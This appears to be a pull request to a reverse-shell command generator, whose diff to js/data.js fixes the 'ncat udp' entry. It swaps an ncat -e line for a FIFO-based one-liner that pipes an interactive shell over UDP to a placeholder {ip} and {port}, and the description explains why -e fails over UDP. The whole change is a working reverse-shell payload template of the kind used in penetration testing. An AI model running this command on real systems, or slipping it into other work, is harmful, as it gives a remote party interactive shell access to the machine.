### PR TITLE
Fixing ncat udp command.

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -76,7 +76,7 @@ const reverseShellCommands = withCommandType(
         },
         {
             "name": "ncat udp",
-            "command": "ncat {ip} {port} -e {shell}",
+            "command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|ncat -u {ip} {port} >/tmp/f",
             "meta": ["linux", "mac"]
         },
         {


### PR DESCRIPTION
The previous command was actually using TCP. Ncat's -u flag switches to UDP, but this doesn't appear to work with the -e flag, as UDP doesn't establish a "connection" to trigger the execution. Using a FIFO solves this issue.